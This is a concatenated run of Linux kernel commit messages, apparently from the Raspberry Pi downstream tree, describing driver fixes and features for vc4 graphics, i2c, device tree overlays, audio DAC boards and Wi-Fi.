* Added a writable sysfs object to enable scripts / user space software
to blink MIDI activity LEDs for variable duration.
* Improved hw_param constraints setting.
* Added compatibility with S16_LE sample format.
* Exposed some simple placeholder volume controls, so the card appears
in volumealsa widget.
Signed-off-by: Giedrius Trainavicius <giedrius@blokas.io>
[ Upstream commit 1bcaa05ebe ]
This reverts commit 18339f59c3 ("HID: dragonrise: fix HID...") because it
breaks certain dragonrise 0079:0006 gamepads. While it may fix a breakage
caused by commit 79346d620e ("HID: input: force generic axis to be mapped
to their user space axis"), it is probable that the manufacturer released
different hardware with the same PID so this fix works for only a subset
and breaks the other gamepads sharing the PID.
What is needed is another more generic solution which fixes 79346d620e
("HID: input: force generic axis ...") breakage for this controller: we
need to add an exception for this driver to make it keep the old behaviour
previous to the initial breakage (this is done in patch 2 of this series).
Signed-off-by: Ioan-Adrian Ratiu <adi@adirat.com>
Reviewed-by: Benjamin Tissoires <benjamin.tissoires@redhat.com>
Signed-off-by: Jiri Kosina <jkosina@suse.cz>
The i2c-sensor overlay is a container for various pressure and
temperature sensors, currently bmp085 and bmp280. The standalone
bmp085_i2c-sensor overlay is now deprecated.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
FS threading brings performance improvements of 0-20% in glmark2.
The validation code checks for thread switch signals and ensures that
the registers of the other thread are not touched, and that our clamps
are not live across thread switches. It also checks that the
threading and branching instructions do not interfere.
(Original patch by Jonas, changes by anholt for style cleanup,
removing validation the kernel doesn't need to do, and adding the flag
for userspace).
v2: Minor style fixes from checkpatch.
Signed-off-by: Jonas Pfeil <pfeiljonas@gmx.de>
Signed-off-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit c778cc5df9)
The pm_runtime_put() we were using immediately released power on the
device, which meant that we were generally turning the device off and
on once per frame. In many profiles I've looked at, that added up to
about 1% of CPU time, but this could get worse in the case of frequent
rendering and readback (as may happen in X rendering). By keeping the
device on until we've been idle for a couple of frames, we drop the
overhead of runtime PM down to sub-.1%.
Signed-off-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit 3a62234680)
The validation for it ends up being quite simple, but I hadn't got
around to it before merging the driver. For backwards compatibility,
we also need to add a flag so that the userspace GL driver can easily
tell if the kernel will allow ETC1 textures (on an old kernel, it will
continue to convert to RGBA8)
Signed-off-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit 7154d76fed)
The loop is scanning until the original max_ip (size of the BO), but
we want to not examine any code after the PROG_END's delay slots.
There was a block trying to do that, except that we had some early
continue statements if the signal wasn't a PROG_END or a BRANCH.
The failure mode would be that a valid shader is rejected because some
undefined memory after the PROG_END slots is parsed as a branch and
the rest of its setup is illegal. I haven't seen this in the wild,
but valgrind was complaining when about this up in the userland
simulator mode.
Signed-off-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit 457e67a728)
If the allocation fails the current code returns success. If
copy_from_user() fails it returns the number of bytes remaining instead
of -EFAULT.
Fixes: d5b1a78a77 ("drm/vc4: Add support for drawing 3D frames.")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: Eric Anholt <eric@anholt.net>
(cherry picked from commit b2cdeb19f1)
This gets us normal 3D support on top of the existing firmware display
stack. There's no real modesetting support, no async pageflips
(hurting performance), etc., but it means that the desktop can at
least run until we get full native modesetting.
Signed-off-by: Eric Anholt <eric@anholt.net>
Now that we have infoframes to report the pixel repeat flag, we can
start using it. Fixes locking the 720x480i and 720x576i modes on my
Dell 2408WFP. Like the 1920x1080i case, they don't fit properly on
the screen, though.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes a purple bar on the left side of the screen with my Dell
2408WFP. It will also be required for supporting the double-clocked
video modes.
Signed-off-by: Eric Anholt <eric@anholt.net>
We really do need to be using the halved V fields. I had been
confused by the code I was using as a reference because it stored
halved vsync fields but not halved vdisplay, so it looked like I only
needed to divide vdisplay by 2.
This reverts part of Mario's timestamping fixes that prevented
CRTC_HALVE_V from applying, and instead adjusts the timestamping code
to not use the crtc field in that case.
Fixes locking of 1920x1080x60i on my Dell 2408WFP. There are black
bars on the top and bottom, but I suspect that might be an
under/overscan flags problem as opposed to video timings.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes occasional debug spew at boot when connected directly through
HDMI, and probably confusing the HDMI state machine when we go trying
to poke registers for the enable sequence too soon.
Signed-off-by: Eric Anholt <eric@anholt.net>
On Pi0/1/2, we use an external GPIO line for hotplug detection, since
the HDMI_HOTPLUG register isn't connected to anything. However, with
the Pi3 the HPD GPIO line has moved off to a GPIO expander that will
be tricky to get to (the firmware is constantly polling the expander
using i2c0, so we'll need to coordinate with it).
As a stop-gap, if we don't have a GPIO line, use an EDID probe to
detect connection. Fixes HDMI display on the pi3.
Signed-off-by: Eric Anholt <eric@anholt.net>
Fixes broken grayscale ramps on many HDMI monitors, where large areas
at the ends of the ramp would all appear as black or white.
Signed-off-by: Eric Anholt <eric@anholt.net>
The combo of list_empty() check and return list_first_entry()
can be replaced with list_first_entry_or_null().
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
This came from the initial bringup code, which always idled the GPU
and always reset the overflow. That massively increases the size of
the working set when you're doing lots of small draws, though, as is
common on X desktops or piglit.
Signed-off-by: Eric Anholt <eric@anholt.net>
Add missing drm_crtc_vblank_on/off() calls so vblank irq
handling/updating/timestamping never runs with a crtc shut down
or during its shutdown/startup, as that causes large jumps in
vblank count and trouble for compositors.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
On top of the interlaced video mode fix and with some additional
adjustments, this now works well. It has almost the same accuracy
as on regular progressive scan modes.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
We can't handle doublescan modes at the moment, so if
userspace tries to set one, reject the mode set.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
We must not apply CRTC_INTERLACE_HALVE_V to interlaced modes during
mode enumeration, as drm_helper_probe_single_connector_modes
does, so wrap it and reset the effect of CRTC_INTERLACE_HALVE_V
on affected interlaced modes.
Also mode_fixup interlaced modes passed in from user space.
This fixes the vblank timestamping constants and entries in
the mode->crtc_xxx fields needed for precise vblank timestamping.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
We already don't expose such modes to userspace, but make
sure userspace can't sneak some interlaced mode in.
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Signed-off-by: Eric Anholt <eric@anholt.net>
The plane .prepare_fb() and .cleanup_fb() helpers are optional, there's
no need to implement empty stubs, and no need to explicitly set the
function pointers to NULL either.
Signed-off-by: Laurent Pinchart <laurent.pinchart+renesas@ideasonboard.com>
[danvet: Resolved conflicts with Chris' patch.]
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
MIDI requires 31.25kbaud, a baudrate unsupported by Linux. The
midi-uart0 overlay configures uart0 (ttyAMA0) to use a fake clock
so that requesting 38.4kbaud actually gets 31.25kbaud.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Format ioctls:
test VIDIOC_ENUM_FMT/FRAMESIZES/FRAMEINTERVALS: OK
warn: v4l2-test-formats.cpp(1195): S_PARM is supported but
doesn't report V4L2_CAP_TIMEPERFRAME.
fail: v4l2-test-formats.cpp(1118): node->has_frmintervals
&& !cap->capability
Applying to the audioinjector sound card only. This patch offsets channel
2 correctly from the LR clock. This ensures that channel 2 doesn't loose
any bits during capture. It also results in both channels 1 and 2 having
the same volume. This commit also adds 8 kHz operation.
Signed-off-by: Matt Flax <flatmax@flatmax.org>
With the death of ARCH_BCM2708 and ARCH_BCM2709, a new way is needed to
determine if this is a "downstream" build that wants the firmware to
load a bcm27xx .dtb. The vc_cma driver is used downstream but not
upstream, making vc_cma_init a suitable predicate symbol.
They are not necessary anymore since both are based on ARCH_BCM2835.
Also use the compatible strings "brcm,bcm2835", "brcm,bcm2836" and "brcm,bcm2837".
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Fixes setting low-resolution video modes on HDMI. Now the PLLH_PIX
divider adjusts itself until the PLLH is within bounds.
Signed-off-by: Eric Anholt <eric@anholt.net>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
This adds a debug module parameter to aid in debugging transfer issues
by printing info to the kernel log. When enabled, status values are
collected in the interrupt routine and msg info in
bcm2835_i2c_start_transfer(). This is done in a way that tries to avoid
affecting timing. Having printk in the isr can mask issues.
debug values (additive):
1: Print info on error
2: Print info on all transfers
3: Print messages before transfer is started
The value can be changed at runtime:
/sys/module/i2c_bcm2835/parameters/debug
Example output, debug=3:
[ 747.114448] bcm2835_i2c_xfer: msg(1/2) write addr=0x54, len=2 flags= [i2c1]
[ 747.114463] bcm2835_i2c_xfer: msg(2/2) read addr=0x54, len=32 flags= [i2c1]
[ 747.117809] start_transfer: msg(1/2) write addr=0x54, len=2 flags= [i2c1]
[ 747.117825] isr: remain=2, status=0x30000055 : TA TXW TXD TXE [i2c1]
[ 747.117839] start_transfer: msg(2/2) read addr=0x54, len=32 flags= [i2c1]
[ 747.117849] isr: remain=32, status=0xd0000039 : TA RXR TXD RXD [i2c1]
[ 747.117861] isr: remain=20, status=0xd0000039 : TA RXR TXD RXD [i2c1]
[ 747.117870] isr: remain=8, status=0x32 : DONE TXD RXD [i2c1]
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Support a dynamic clock by reading the frequency and setting the
divisor in the transfer function instead of during probe.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Martin Sperl <kernel@martin.sperl.org>
Use i2c_adapter->timeout for the completion timeout value. The core
default is 1 second.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Documentation/i2c/i2c-protocol states that Combined transactions should
separate messages with a Start bit and end the whole transaction with a
Stop bit. This patch adds support for issuing only a Start between
messages instead of a Stop followed by a Start.
This implementation differs from downstream i2c-bcm2708 in 2 respects:
- it uses an interrupt to detect that the transfer is active instead
of using polling. There is no interrupt for Transfer Active, but by
not prefilling the FIFO it's possible to use the TXW interrupt.
- when resetting/disabling the controller between transfers it writes
CLEAR to the control register instead of just zero.
Using just zero gave many errors. This might be the reason why
downstream had to disable this feature and make it available with a
module parameter.
I have run thousands of transfers to a DS1307 (rtc), MMA8451 (accel)
and AT24C32 (eeprom) in parallel without problems.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Acked-by: Eric Anholt <eric@anholt.net>
The controller can't support this flag, so remove it.
Documentation/i2c/i2c-protocol states that all of the message is sent:
I2C_M_IGNORE_NAK:
Normally message is interrupted immediately if there is [NA] from the
client. Setting this flag treats any [NA] as [A], and all of
message is sent.
From the BCM2835 ARM Peripherals datasheet:
The ERR field is set when the slave fails to acknowledge either
its address or a data byte written to it.
So when the controller doesn't receive an ack, it sets ERR and raises
an interrupt. In other words, the whole message is not sent.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Writing to an AT24C32 generates on average 2x i2c transfer errors per
32-byte page write. Which amounts to a lot for a 4k write. This is due
to the fact that the chip doesn't respond during it's internal write
cycle when the at24 driver tries and retries the next write.
Only a handful drivers use dev_err() on transfer error, so switch to
dev_dbg() instead.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
If an unexpected TXW or RXR interrupt occurs (msg_buf_remaining == 0),
the driver has no way to fill/drain the FIFO to stop the interrupts.
In this case the controller has to be disabled and the transfer
completed to avoid hang.
(CLKT | ERR) and DONE interrupts are completed in their own paths, and
the controller is disabled in the transfer function after completion.
Unite the code paths and do disabling inside the interrupt routine.
Clear interrupt status bits in the united completion path instead of
trying to do it on every interrupt which isn't necessary.
Only CLKT, ERR and DONE can be cleared that way.
Add the status value to the error value in case of TXW/RXR errors to
distinguish them from the other S_LEN error.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Writing messages larger than the FIFO size results in a hang, rendering
the machine unusable. This is because the RXD status flag is set on the
first interrupt which results in bcm2835_drain_rxfifo() stealing bytes
from the buffer. The controller continues to trigger interrupts waiting
for the missing bytes, but bcm2835_fill_txfifo() has none to give.
In this situation wait_for_completion_timeout() apparently is unable to
stop the madness.
The BCM2835 ARM Peripherals datasheet has this to say about the flags:
TXD: is set when the FIFO has space for at least one byte of data.
RXD: is set when the FIFO contains at least one byte of data.
TXW: is set during a write transfer and the FIFO is less than full.
RXR: is set during a read transfer and the FIFO is or more full.
Implementing the logic from the downstream i2c-bcm2708 driver solved
the hang problem.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Reviewed-by: Martin Sperl <kernel@martin.sperl.org>
The raspberrypi-power driver is now used to turn on USB power.
This partly reverts commit:
firmware: bcm2835: Support ARCH_BCM270x
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
This file doesn't build anymore and isn't used so remove it.
It was added as part of my ARCH_BCM2835 work last year, but the future
didn't pan out as expected.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Drop NEED_MACH_MEMORY_H and use dma-ranges from the Device Tree to
get the bus address, like ARCH_BCM2835 does.
This means that we go from this:
arch/arm/mach-bcm270x/include/mach/memory.h:
define __virt_to_bus(x) ((x) + (BUS_OFFSET - PAGE_OFFSET))
define __bus_to_virt(x) ((x) - (BUS_OFFSET - PAGE_OFFSET))
define __pfn_to_bus(x) (__pfn_to_phys(x) + BUS_OFFSET)
define __bus_to_pfn(x) __phys_to_pfn((x) - BUS_OFFSET
To this:
arch/arm/include/asm/memory.h:
define __virt_to_bus __virt_to_phys
define __bus_to_virt __phys_to_virt
define __pfn_to_bus(x) __pfn_to_phys(x)
define __bus_to_pfn(x) __phys_to_pfn(x)
Drivers now have to use the DMA API to get to the bus address.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
This makes it possible to get the bus address from Device Tree.
At the same time move the call to log_init() after getting the clock
to avoid allocating twice due to deferred probing.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
NEED_MACH_IO_H isn't necessary since we don't have
PC card/PCI/ISA IO space.
The __io macro is only used in the {in,out}[bwl] macros.
arch/arm/include/asm/io.h will give these defaults now:
define __io(a) __typesafe_io((a) & IO_SPACE_LIMIT)
define IO_SPACE_LIMIT ((resource_size_t)0)
This is the same as ARCH_BCM2835.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
1. Enable emulation of deprecated instructions.
2. Enable ARM 8.1 and 8.2 features which are not detected at runtime.
3. Switch the default governer to powersave.
4. Include the watchdog timer driver in the kernel image rather then a module.
Tested with raspbian-jessie 2016-09-23.
so that special/critical clocks can get enabled early on
in the boot process avoiding the risk of disabling a clock,
pll_divider or pll when a claiming driver fails to install
propperly - maybe it needs to defer.
Signed-off-by: Martin Sperl <kernel@martin.sperl.org>
All drivers map their own io now so it's not necessary to do this
mapping anymore. The mapping for the uart debug console is handled by
debug_ll_io_init() if necessary.
Remove local uart debug code and rely on mainline.
Use these kconfig options to enable:
CONFIG_DEBUG_BCM2835
CONFIG_DEBUG_BCM2836
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Drop the call to init_dma_coherent_pool_size(). The default 256kB is
enough since vchiq dropped that atomic allocation some time back.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
include/mach/vmalloc.h has not been used since 2011.
include/mach/entry-macro.S is leftover from the move to the mainline
irq driver.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The watchdog driver already has support for reboot/poweroff.
Make use of this and remove the code from the platform files.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The Raspberry Pi firmware looks at the RSTS register to know which
partition to boot from. The reboot syscall command
LINUX_REBOOT_CMD_RESTART2 supports passing in a string argument.
Add support for passing in a partition number 0..63 to boot from.
Partition 63 is a special partiton indicating halt.
If the partition doesn't exist, the firmware falls back to partition 0.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The mainline Device Tree files are quite close to downstream now.
Let's use bcm283x.dtsi, bcm2835.dtsi and bcm2836.dtsi as base files
for our dts files.
Mainline dts files are based on these files:
bcm2835-rpi.dtsi
bcm2835.dtsi bcm2836.dtsi
bcm283x.dtsi
Current downstream are based on these:
bcm2708.dtsi bcm2709.dtsi bcm2710.dtsi
bcm2708_common.dtsi
This patch introduces this dependency:
bcm2708.dtsi bcm2709.dtsi
bcm2708-rpi.dtsi
bcm270x.dtsi
bcm2835.dtsi bcm2836.dtsi
bcm283x.dtsi
And:
bcm2710.dtsi
bcm2708-rpi.dtsi
bcm270x.dtsi
bcm283x.dtsi
bcm270x.dtsi contains the downstream bcm283x.dtsi diff.
bcm2708-rpi.dtsi is the downstream version of bcm2835-rpi.dtsi.
Other changes:
- The led node has moved from /soc/leds to /leds. This is not a problem
since the label is used to reference it.
- The clk_osc reg property changes from 6 to 3.
- The gpu nodes has their interrupt property set in the base file.
- the clocks label does not point to the /clocks node anymore, but
points to the cprman node. This is not a problem since the overlays
that use the clock node refer to it directly: target-path = "/clocks";
- some nodes now have 2 labels since mainline and downstream differs in
this respect: cprman/clocks, spi0/spi, gpu/vc4.
- some nodes doesn't have an explicit status = "okay" since they're not
disabled in the base file: watchdog and random.
- gpiomem doesn't need an explicit status = "okay".
- bcm2708-rpi-cm.dts got the hpd-gpios property from bcm2708_common.dtsi,
it's now set directly in that file.
- bcm2709-rpi-2-b.dts has the timer node moved from /soc/timer to /timer.
- Removed clock-frequency property on the bcm{2709,2710}.dtsi timer nodes.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
irq-bcm2836 handles this through these functions:
bcm2835_init_local_timer_frequency()
bcm2836_arm_irqchip_smp_init()
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Kernel 4.4.6+ on RaspberryPi support .dtbo files for overlays, instead of .dtb.
Patch the kernel, which has faulty rules to generate .dtbo the way yocto does
Signed-off-by: Herve Jourdain <herve.jourdain@neuf.fr>
Signed-off-by: Khem Raj <raj.khem@gmail.com>
The old "of_overlay_apply" string does not appear in 4.8 kernel builds.
"of_cfs_init" is both present and a more accurate indication of support
for dynamically loading overlays (although the trailer is now of little
practical use and the firmware assumes DT support and will look for
both .dtbo and -overlay.dtb overlays).
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Some evidence of curing disconnects with this disabled, so make it a default.
Can be overridden with module parameter roamoff=0
See: http://projectable.me/optimize-my-pi-wi-fi/
Commit 73345fd212:
brcmfmac: Configure country code using device specific settings
prevents region codes from working on devices that lack a region code
translation table. In the event of an absent table, preserve the old
behaviour of using the provided code as-is.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Disable wireless power saving in the brcmfmac WLAN driver. This is a
temporary measure until the connectivity loss resulting from power
saving is resolved.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
This is a port of Pantelis Antoniou's v3 port that makes use of the
new upstreamed configfs support for binary attributes.
Original commit message:
Add a runtime interface to using configfs for generic device tree overlay
usage. With it its possible to use device tree overlays without having
to use a per-platform overlay manager.
Please see Documentation/devicetree/configfs-overlays.txt for more info.
Changes since v2:
- Removed ifdef CONFIG_OF_OVERLAY (since for now it's required)
- Created a documentation entry
- Slight rewording in Kconfig
Changes since v1:
- of_resolve() -> of_resolve_phandles().
Originally-signed-off-by: Pantelis Antoniou <pantelis.antoniou@konsulko.com>
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
DT configfs: Fix build errors on other platforms
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
DT configfs: fix build error
There is an error when compiling rpi-4.6.y branch:
CC drivers/of/configfs.o
drivers/of/configfs.c:291:21: error: initialization from incompatible pointer type [-Werror=incompatible-pointer-types]
.default_groups = of_cfs_def_groups,
^
drivers/of/configfs.c:291:21: note: (near initialization for 'of_cfs_subsys.su_group.default_groups.next')
The .default_groups is linked list since commit
1ae1602de0.
This commit uses configfs_add_default_group to fix this problem.
Signed-off-by: Slawomir Stepien <sst@poczta.fm>
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
suppress spurious messages
Add #if for 3.14 kernel change (#87)
Fixes compiling after changes in f663dd9aaf and 99932d4fc0Fixes#86
Set dev_type to wlan
Fixes#23
Tentatively added support for more 8188CUS based devices.
Add support for more 8188CUS and 8192CUS devices
Add ProductId for the Netgear N150 - WNA1000M
Fixes CONFIG_CONCURRENT_MODE CONFIG_MULTI_VIR_IFACES
Fixes compatibility with 3.13
Enables warning in the compiler and fixes some issues, reference => https://github.com/diederikdehaas/rtl8812AU
Starts device in station mode instead of monitor, fixes NetworkManager issues
Enable cfg80211 support
Fix cfg80211 for kernel >= 4.7
Fixes rtl8192cu for kernel >= 4.8
Add non-mainline source for rtl8192cu wireless driver version v4.0.2_9000 as
this is widely used. Disable older rtlwifi driver.
8192cu needs old wireless extensions
The obsolete WIRELESS_EXT configuration is used
by the old Realtek code and is needed for AP support.
8192cu: CONFIG_AP_MODE hardcoded in autoconf.h
rtl8192c_rf6052: PHY_RFShadowRefresh(): fix off-by-one
Signed-off-by: Marc Kleine-Budde <mkl@blackshift.org>
rtl8192cu: Add PID for D-Link DWA 131
The pl011 driver looks for DT aliases of the form "serial<n>",
and if found uses <n> as the device ID. This can cause
/dev/ttyAMA0 to become /dev/ttyAMA1, which is confusing if the
other serial port is provided by the 8250 driver which doesn't
use the same logic.
Add a mailbox-driven backlight controller for the Raspberry Pi DSI
touchscreen display. Requires updated GPU firmware to recognise the
mailbox request.
Signed-off-by: Gordon Hollingworth <gordon@raspberrypi.org>
Add initial 2 channel (stereo) support for Allo Piano DAC (2.0/2.1) boards,
using allo-piano-dac-pcm512x-audio overlay and allo-piano-dac ALSA ASoC
machine driver.
NB. The initial support is 2 channel (stereo) ONLY!
(The Piano DAC 2.1 will only support 2 channel (stereo) left/right output,
pending an update to the upstream pcm512x codec driver, which will have
to be submitted via upstream. With the initial downstream support,
provided by this patch, the Piano DAC 2.1 subwoofer outputs will
not function.)
Signed-off-by: Baswaraj K <jaikumar@cem-solutions.net>
Signed-off-by: Clive Messer <clive.messer@digitaldreamtime.co.uk>
Tested-by: Clive Messer <clive.messer@digitaldreamtime.co.uk>
Support IQAudIO Digi board with iqaudio_digi machine driver and
iqaudio-digi-wm8804-audio overlay.
NB. Machine driver is a cut and paste of hifiberry_digi code, with format
and general cleanup to comply with kernel coding standards.
Signed-off-by: DigitalDreamtime <clive.messer@digitaldreamtime.co.uk>
Contains the sound/soc/bcm ALSA machine driver and necessary alterations to the Kconfig and Makefile.
Adds the dts overlay and updates the Makefile and README.
Updates the relevant defconfig files to enable building for the Raspberry Pi.
Thanks to Phil Elwell (pelwell) for the review, simple-card concepts and discussion. Thanks to Clive Messer for overlay naming suggestions.
Added support for headphones, microphone and bclk_ratio settings.
This patch adds headphone and microphone capability to the Audio Injector sound card. The patch also sets the bit clock ratio for use in the bcm2835-i2s driver. The bcm2835-i2s can't handle an 8 kHz sample rate when the bit clock is at 12 MHz because its register is only 10 bits wide which can't represent the ch2 offset of 1508. For that reason, the rate constraint is added.
This commit adds basic support for the codec usage including: Device tree overlay,
binding I2S bus and setting I2S mode, clock source and frequency setting according
to spec.
Signed-off-by: Andrey Grodzovsky <andrey2805@gmail.com>
justboom-dac: Adjust for ALSA API change
As of 4.4, snd_soc_limit_volume now takes a struct snd_soc_card *
rather than a struct snd_soc_codec *.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Signed-off-by: Jan Grulich <jan@grulich.eu>
config: fix RaspiDAC Rev.3x dependencies
Change depends to SND_BCM2708_SOC_I2S || SND_BCM2835_SOC_I2S
like the other I2S soundcard drivers.
Signed-off-by: Matthias Reichl <hias@horus.com>
The driver contains a low-level hardware driver for the TAS5713 and the
drivers for the Raspberry Pi I2S subsystem.
TAS5713: return error if initialisation fails
Existing TAS5713 driver logs errors during initialisation, but does not return
an error code. Therefore even if initialisation fails, the driver will still be
loaded, but won't work. This patch fixes this. I2C communication error will now
reported correctly by a non-zero return code.
HiFiBerry Amp: fix device-tree problems
Some code to load the driver based on device-tree-overlays was missing. This is added by this patch.
The driver is based on the HiFiBerry DAC driver. However HiFiBerry DAC+ uses
a different codec chip (PCM5122), therefore a new driver is necessary.
Add support for the HiFiBerry DAC+ Pro.
The HiFiBerry DAC+ and DAC+ Pro products both use the existing bcm sound driver with the DAC+ Pro having a special clock device driver representing the two high precision oscillators.
An addition bug fix is included for the PCM512x codec where by the physical size of the sample frame is used in the calculation of the LRCK divisor as it was found to be wrong when using 24-bit depth sample contained in a little endian 4-byte sample frame.
Limit PCM512x "Digital" gain to 0dB by default with HiFiBerry DAC+
24db_digital_gain DT param can be used to specify that PCM512x
codec "Digital" volume control should not be limited to 0dB gain,
and if specified will allow the full 24dB gain.
Add dt param to force HiFiBerry DAC+ Pro into slave mode
"dtoverlay=hifiberry-dacplus,slave"
Add 'slave' param to use HiFiBerry DAC+ Pro in slave mode,
with Pi as master for bit and frame clock.
Signed-off-by: DigitalDreamtime <clive.messer@digitaldreamtime.co.uk>
Set a limit of 0dB on Digital Volume Control
The main volume control in the PCM512x DAC has a range up to
+24dB. This is dangerously loud and can potentially cause massive
clipping in the output stages. Therefore this sets a sensible
limit of 0dB for this control.
Allow up to 24dB digital gain to be applied when using IQAudIO DAC+
24db_digital_gain DT param can be used to specify that PCM512x
codec "Digital" volume control should not be limited to 0dB gain,
and if specified will allow the full 24dB gain.
Modify IQAudIO DAC+ ASoC driver to set card/dai config from dt
Add the ability to set the card name, dai name and dai stream name, from
dt config.
Signed-off-by: DigitalDreamtime <clive.messer@digitaldreamtime.co.uk>
IQaudIO: auto-mute for AMP+ and DigiAMP+
IQAudIO amplifier mute via GPIO22. Add dt params for "one-shot" unmute
and auto mute.
Revision 2, auto mute implementing HiassofT suggestion to mute/unmute
using set_bias_level, rather than startup/shutdown....
"By default DAPM waits 5 seconds (pmdown_time) before shutting down
playback streams so a close/stop immediately followed by open/start
doesn't trigger an amp mute+unmute."
Tested on both AMP+ (via DAC+) and DigiAMP+, with both options...
dtoverlay=iqaudio-dacplus,unmute_amp
"one-shot" unmute when kernel module loads.
dtoverlay=iqaudio-dacplus,auto_mute_amp
Unmute amp when ALSA device opened by a client. Mute, with 5 second delay
when ALSA device closed. (Re-opening the device within the 5 second close
window, will cancel mute.)
Revision 4, using gpiod.
Revision 5, clean-up formatting before adding mute code.
- Convert tab plus 4 space formatting to 2x tab
- Remove '// NOT USED' commented code
Revision 6, don't attempt to "one-shot" unmute amp, unless card is
successfully registered.
Signed-off-by: DigitalDreamtime <clive.messer@digitaldreamtime.co.uk>
Signed-off-by: Daniel Matuschek <daniel@matuschek.net>
Add a parameter to turn off SPDIF output if no audio is playing
This patch adds the paramater auto_shutdown_output to the kernel module.
Default behaviour of the module is the same, but when auto_shutdown_output
is set to 1, the SPDIF oputput will shutdown if no stream is playing.
bugfix for 32kHz sample rate, was missing
HiFiBerry Digi: set SPDIF status bits for sample rate
The HiFiBerry Digi driver did not signal the sample rate in the SPDIF status bits.
While this is optional, some DACs and receivers do not accept this signal. This patch
adds the sample rate bits in the SPDIF status block.
This adds a machine driver for the HifiBerry DAC.
It is a sound card that can
be stacked onto the Raspberry Pi.
Signed-off-by: Florian Meier <florian.meier@koalo.de>
The Raspberry Pi firmware manages the power-down and reboot
process. To do this it installs a pm_power_off handler, causing
the gpio-poweroff module to abort the probe function.
This patch introduces a "force" DT property that overrides that
behaviour, and also adds a DT overlay to enable and control it.
Note that running in an active-low configuration (DT parameter
"active_low") requires a custom dt-blob.bin and probably won't
allow a reboot without switching off, so an external inversion
of the trigger signal may be preferable.
Provide a __copy_from_user that uses memcpy. On BCM2708, use
optimised memcpy/memmove/memcmp/memset implementations.
arch/arm: Add mmiocpy/set aliases for memcpy/set
See: https://github.com/raspberrypi/linux/issues/1082
copy_from_user: CPU_SW_DOMAIN_PAN compatibility
The downstream copy_from_user acceleration must also play nice with
CONFIG_CPU_SW_DOMAIN_PAN.
See: https://github.com/raspberrypi/linux/issues/1381
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
1-wire: Add support for configuring pin for w1-gpio kernel module
See: https://github.com/raspberrypi/linux/pull/457
Add bitbanging pullups, use them for w1-gpio
Allows parasite power to work, uses module option pullup=1
bcm2708: Ensure 1-wire pullup is disabled by default, and expose as module parameter
Signed-off-by: Alex J Lennon <ajlennon@dynamicdevices.co.uk>
w1-gpio: Add gpiopin module parameter and correctly free up gpio pull-up pin, if set
Signed-off-by: Alex J Lennon <ajlennon@dynamicdevices.co.uk>
w1-gpio: Sort out the pullup/parasitic power tangle
Especially on platforms with a slower CPU but a relatively high
framebuffer fill bandwidth, like current ARM devices, the existing
console monochrome imageblit function used to draw console text is
suboptimal for common pixel depths such as 16bpp and 32bpp. The existing
code is quite general and can deal with several pixel depths. By creating
special case functions for 16bpp and 32bpp, by far the most common pixel
formats used on modern systems, a significant speed-up is attained
which can be readily felt on ARM-based devices like the Raspberry Pi
and the Allwinner platform, but should help any platform using the
fb layer.
The special case functions allow constant folding, eliminating a number
of instructions including divide operations, and allow the use of an
unrolled loop, eliminating instructions with a variable shift size,
reducing source memory access instructions, and eliminating excessive
branching. These unrolled loops also allow much better code optimization
by the C compiler. The code that selects which optimized variant is used
is also simplified, eliminating integer divide instructions.
The speed-up, measured by timing 'cat file.txt' in the console, varies
between 40% and 70%, when testing on the Raspberry Pi and Allwinner
ARM-based platforms, depending on font size and the pixel depth, with
the greater benefit for 32bpp.
Signed-off-by: Harm Hanemaaijer <fgenfb@yahoo.com>
